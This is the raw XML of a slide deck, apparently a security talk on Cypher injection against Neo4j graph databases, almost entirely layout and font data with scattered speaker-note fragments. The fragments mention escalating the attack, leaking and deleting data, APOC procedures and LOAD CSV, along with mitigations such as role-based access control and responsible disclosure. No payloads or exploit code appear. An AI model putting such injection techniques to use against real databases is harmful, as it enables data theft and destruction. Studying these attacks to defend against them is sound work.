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Ubuntu"/>
      <p:regular r:id="rId54"/>
      <p:bold r:id="rId55"/>
      <p:italic r:id="rId56"/>
      <p:boldItalic r:id="rId57"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Staatliches"/>
      <p:regular r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Montserrat Black"/>
      <p:bold r:id="rId59"/>
      <p:boldItalic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9" roundtripDataSignature="AMtx7miLW0EAJ1ET/c/bKb7sGqqswMiv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66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-bold.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-regular.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20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67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-italic.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratBlack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Ubuntu-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Ubuntu-regular.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Ubuntu-boldItalic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Ubuntu-italic.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/MontserratBlack-bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Staatliche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0" name="Shape 3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1" name="Google Shape;312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2" name="Google Shape;312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cypher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Most ppl don’t know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Escalate attack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7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9" name="Google Shape;324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Explain the terms after 2 slides (later)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4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6" name="Google Shape;3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Treedome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3" name="Google Shape;32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4" name="Google Shape;32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4" name="Google Shape;33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0" name="Shape 3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1" name="Google Shape;331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2" name="Google Shape;33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9" name="Google Shape;33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3" name="Google Shape;334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2" name="Google Shape;33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2" name="Shape 3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3" name="Google Shape;336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4" name="Google Shape;33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3" name="Google Shape;31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Member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Learn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4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5" name="Google Shape;338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6" name="Google Shape;33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1" name="Google Shape;34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9" name="Google Shape;34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9" name="Google Shape;34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Attacker from outside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8" name="Google Shape;34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Leak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exploit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delete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Escalate further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Explain what is Neo4j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8" name="Google Shape;34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Clause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8" name="Google Shape;346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7" name="Google Shape;347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Procedure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Clause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6" name="Google Shape;348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Apoc.text.join - list to string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5" name="Google Shape;34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3" name="Google Shape;31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you’re gonna get from this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5" name="Google Shape;350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2" name="Google Shape;351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9" name="Shape 3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0" name="Google Shape;3530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1" name="Google Shape;353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8" name="Shape 3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9" name="Google Shape;353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0" name="Google Shape;35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6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7" name="Google Shape;354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8" name="Google Shape;354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3" name="Shape 3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4" name="Google Shape;3554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5" name="Google Shape;355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2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3" name="Google Shape;359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4" name="Google Shape;359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1" name="Google Shape;360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0" name="Google Shape;364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0" name="Google Shape;365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Develop fix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6" name="Google Shape;3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Forget everything you know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 caesar-cipher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NOT crypto cypher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0" name="Shape 3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1" name="Google Shape;3661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2" name="Google Shape;366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Plugin - extension to Cypher Language in Neo4J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9" name="Shape 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0" name="Google Shape;3670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1" name="Google Shape;367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0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2" name="Google Shape;368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0" name="Google Shape;369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Stored procedures (e.g Java)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0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2" name="Google Shape;370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Can’t disable LOAD CSV function specificallyRBAC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Role-based access control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Responsible disclosure - disable apoc - revoke procedure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1" name="Shape 3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2" name="Google Shape;3712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3" name="Google Shape;371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2" name="Google Shape;372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350">
                <a:solidFill>
                  <a:srgbClr val="4E545B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>accept an input argument and evaluates it against one or more expressions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2" name="Google Shape;3732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3" name="Google Shape;373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3" name="Shape 3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4" name="Google Shape;3744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5" name="Google Shape;374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2" name="Google Shape;3752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3" name="Google Shape;3753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5" name="Google Shape;3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Say NO - caesar cipher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Used in GraphDB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Injection similar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3" name="Google Shape;31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7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9" name="Google Shape;31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Relational, object oriented, graph DBs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GraphQL - API query language to pull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5" name="Google Shape;323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3" name="Google Shape;32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51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-13316" y="0"/>
            <a:ext cx="9164699" cy="5208136"/>
            <a:chOff x="-13316" y="0"/>
            <a:chExt cx="9164699" cy="5208136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;11;p51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51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6118235" y="0"/>
              <a:ext cx="3025768" cy="2023351"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="16935" w="25325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51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3448062" cy="2305785"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="16935" w="25325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51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5905501" y="2793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51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7545725" y="4003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51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51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6524623" y="0"/>
              <a:ext cx="2619371" cy="1017382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51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="-26" y="5"/>
              <a:ext cx="2038372" cy="1475619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51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7855910" y="4"/>
              <a:ext cx="1280725" cy="3383675"/>
              <a:chOff x="9196698" y="950579"/>
              <a:chExt cx="1280725" cy="3383675"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Google Shape;20;p51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9419903" y="2786190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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9599228" y="2157664"/>
                <a:ext cx="26379" cy="26632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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9546302" y="3614502"/>
                <a:ext cx="44049" cy="47093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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9828268" y="3796617"/>
                <a:ext cx="38215" cy="35341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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10207125" y="3808369"/>
                <a:ext cx="26632" cy="26632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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9549176" y="3999362"/>
                <a:ext cx="82349" cy="79306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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9196698" y="3144502"/>
                <a:ext cx="29423" cy="29507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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9707787" y="1811104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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9613771" y="3653647"/>
                <a:ext cx="106868" cy="90212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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9387775" y="3309201"/>
                <a:ext cx="79221" cy="70597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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9540468" y="1825815"/>
                <a:ext cx="79306" cy="70851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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9725373" y="1297224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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9834186" y="950579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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9666613" y="965375"/>
                <a:ext cx="79559" cy="70597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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10177702" y="1025488"/>
                <a:ext cx="79475" cy="71612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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9490416" y="2925778"/>
                <a:ext cx="44303" cy="39737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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="9352519" y="3023684"/>
                <a:ext cx="43965" cy="4109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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10177702" y="4093379"/>
                <a:ext cx="29507" cy="29423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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10421622" y="4278284"/>
                <a:ext cx="55801" cy="5597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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="10177702" y="4003758"/>
                <a:ext cx="44303" cy="39822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51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="-5400000">
              <a:off x="6321128" y="2391308"/>
              <a:ext cx="1715385" cy="3918270"/>
              <a:chOff x="10706378" y="539509"/>
              <a:chExt cx="1715385" cy="3918270"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="Google Shape;41;p51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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" name="Google Shape;58;p51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="-5400000">
              <a:off x="5632456" y="-1028869"/>
              <a:ext cx="737423" cy="2819743"/>
              <a:chOff x="12445182" y="1003506"/>
              <a:chExt cx="737423" cy="2819743"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="59" name="Google Shape;59;p51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12486357" y="2971349"/>
                <a:ext cx="35256" cy="35341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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12539199" y="3209181"/>
                <a:ext cx="61889" cy="61889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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12953481" y="2695301"/>
                <a:ext cx="47008" cy="43965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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13106174" y="2316275"/>
                <a:ext cx="20545" cy="17670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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12882969" y="2054939"/>
                <a:ext cx="26379" cy="26463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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13147264" y="194333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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13097212" y="3250271"/>
                <a:ext cx="38385" cy="35341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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12524657" y="360579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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12791742" y="358228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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13035662" y="3767194"/>
                <a:ext cx="53011" cy="5605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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12715396" y="3281215"/>
                <a:ext cx="76431" cy="71612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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12665597" y="3228373"/>
                <a:ext cx="44049" cy="39737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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12445182" y="1003506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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12518738" y="1140895"/>
                <a:ext cx="41175" cy="41259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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="12788952" y="3492753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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13023910" y="2818064"/>
                <a:ext cx="44049" cy="4109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51"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="1" rot="10800000">
                <a:off x="13000405" y="2388309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6" name="Google Shape;76;p51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-2" y="9"/>
              <a:ext cx="3985907" cy="3918269"/>
              <a:chOff x="2524675" y="238075"/>
              <a:chExt cx="1178600" cy="1158600"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Google Shape;77;p51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51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51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51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51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51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51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51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51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51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51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51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1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51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51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51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51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51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1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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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51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" name="Google Shape;131;p51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132" name="Google Shape;132;p51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51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34;p51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35;p51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51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7" name="Google Shape;137;p51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="13729" y="0"/>
              <a:ext cx="1398984" cy="543375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51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5954700" y="0"/>
              <a:ext cx="3189300" cy="1619850"/>
              <a:chOff x="4185675" y="845125"/>
              <a:chExt cx="3189300" cy="1619850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="139" name="Google Shape;139;p51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51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51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" name="Google Shape;142;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785300" y="1645975"/>
            <a:ext cx="55734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Montserrat Black"/>
              <a:buNone/>
              <a:defRPr b="0" sz="6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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905725" y="3239869"/>
            <a:ext cx="5332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 1">
  <p:cSld name="CUSTOM_19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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448700" y="2891519"/>
            <a:ext cx="23946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3" name="Google Shape;963;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1503000" y="3210342"/>
            <a:ext cx="2286000" cy="6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4" name="Google Shape;964;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303800" y="2887919"/>
            <a:ext cx="23946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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5358100" y="3210342"/>
            <a:ext cx="22860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60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4214225"/>
            <a:ext cx="3055899" cy="921047"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="6481" w="21503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0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968" name="Google Shape;968;p60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000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969" name="Google Shape;969;p60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0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0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2" name="Google Shape;972;p60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1007424" y="1007416"/>
            <a:ext cx="3277906" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="973" name="Google Shape;973;p6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6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6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9" name="Google Shape;999;p60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="3878865"/>
            <a:ext cx="3277906" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1000" name="Google Shape;1000;p6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6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6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6" name="Google Shape;1026;p60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5866102" y="3878865"/>
            <a:ext cx="3277907" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1027" name="Google Shape;1027;p6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6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6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6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6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6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6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6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6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6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3" name="Google Shape;1053;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6078400" y="1951788"/>
            <a:ext cx="8454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54" name="Google Shape;1054;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225400" y="1951788"/>
            <a:ext cx="8412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55" name="Google Shape;1055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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713250" y="2335500"/>
            <a:ext cx="7717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8" name="Google Shape;1058;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2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1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1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1" name="Google Shape;1061;p61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062" name="Google Shape;1062;p61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1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1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61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61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61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61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1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61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61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61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61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61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1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1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61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1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61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61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1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61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1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1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1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1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1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61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61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1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61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61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61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1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1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1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61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1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1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1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1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61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1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1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61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61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6" name="Google Shape;1116;p61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="5287722" y="1942450"/>
            <a:ext cx="3853412" cy="3206993"/>
            <a:chOff x="-13316" y="1942450"/>
            <a:chExt cx="3853412" cy="3206993"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1117" name="Google Shape;1117;p61"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" rot="-5400000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1118" name="Google Shape;1118;p61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61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61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1" name="Google Shape;1121;p61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61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3" name="Google Shape;1123;p61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1124" name="Google Shape;1124;p61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61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61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29" name="Google Shape;1129;p61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1130" name="Google Shape;1130;p61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61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61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61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61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1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61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1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61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61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61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61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61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61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1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61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61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61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61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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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1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61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1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1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1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1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1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1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1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1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61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1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1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1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1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1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1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1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4" name="Google Shape;1184;p61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1185" name="Google Shape;1185;p61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1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1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1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1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61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191" name="Google Shape;1191;p61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1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1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1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1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6" name="Google Shape;119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9"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8" name="Google Shape;1198;p62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199" name="Google Shape;1199;p62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62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2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2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62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62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62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62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62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62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62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2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62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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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62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62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2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62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62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2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2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2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2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2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2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2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2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2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2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2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2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2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2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2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3" name="Google Shape;1253;p62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254" name="Google Shape;1254;p62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2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62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62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2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9" name="Google Shape;1259;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="-5400000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1260" name="Google Shape;1260;p62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2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2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3" name="Google Shape;1263;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810250" y="2737275"/>
            <a:ext cx="17889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4" name="Google Shape;1264;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810250" y="2957301"/>
            <a:ext cx="17889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5" name="Google Shape;1265;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2722139" y="2737275"/>
            <a:ext cx="17922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6" name="Google Shape;1266;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2722141" y="2957301"/>
            <a:ext cx="1789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7" name="Google Shape;1267;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4632077" y="2737286"/>
            <a:ext cx="17922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8" name="Google Shape;1268;p62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9" name="Google Shape;1269;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4634482" y="2957301"/>
            <a:ext cx="1789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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544416" y="2737286"/>
            <a:ext cx="17922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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546823" y="2957301"/>
            <a:ext cx="17898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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664725" y="1616400"/>
            <a:ext cx="5826300" cy="19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1275" name="Google Shape;1275;p63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76" name="Google Shape;1276;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="9" y="2729122"/>
            <a:ext cx="3931698" cy="2414389"/>
            <a:chOff x="1076311" y="2571747"/>
            <a:chExt cx="3931698" cy="2414389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1277" name="Google Shape;1277;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762126" y="2571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78" name="Google Shape;1278;p63"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="-5400000">
              <a:off x="2177753" y="2169308"/>
              <a:ext cx="1715385" cy="3918270"/>
              <a:chOff x="10706378" y="539509"/>
              <a:chExt cx="1715385" cy="3918270"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1279" name="Google Shape;1279;p63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63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63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63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63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63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63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63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63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63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63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63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63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63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63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63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63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6" name="Google Shape;1296;p63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3402350" y="3781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7" name="Google Shape;1297;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1007424" y="1007416"/>
            <a:ext cx="3277906" cy="1263054"/>
            <a:chOff x="1766763" y="-4125385"/>
            <a:chExt cx="3277907" cy="1263054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1298" name="Google Shape;1298;p63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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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63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63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3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63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63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3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3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3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3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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416650" y="2088256"/>
            <a:ext cx="43107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7" name="Google Shape;1327;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060050" y="1612250"/>
            <a:ext cx="10239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28" name="Google Shape;1328;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
